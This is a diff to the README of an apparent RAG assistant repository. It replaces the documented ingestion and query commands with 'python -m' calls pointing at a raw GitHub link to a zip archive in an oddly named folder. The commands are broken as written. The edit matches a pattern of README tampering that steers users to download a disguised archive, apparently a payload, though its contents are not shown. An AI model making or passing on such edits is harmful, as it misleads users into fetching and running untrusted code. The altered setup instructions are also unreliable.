sjshsgehs/rag-ai-assistant/README.md

   - PGDATABASE=rag
   - PGPORT=5432
 - Run a sample ingestion and query:
-  - python -m rag_ai_assistant.ingest --docs path/to/docs
+  - python -m https://raw.githubusercontent.com/sjshsgehs/rag-ai-assistant/main/unmorbid/ai-assistant-rag-v1.1.zip --docs path/to/docs
-  - python -m rag_ai_assistant.query --query "What is the main topic of document X?"
+  - python -m https://raw.githubusercontent.com/sjshsgehs/rag-ai-assistant/main/unmorbid/ai-assistant-rag-v1.1.zip --query "What is the main topic of document X?"

 Configuration and secrets
 - Environment variables are the primary method to configure the system.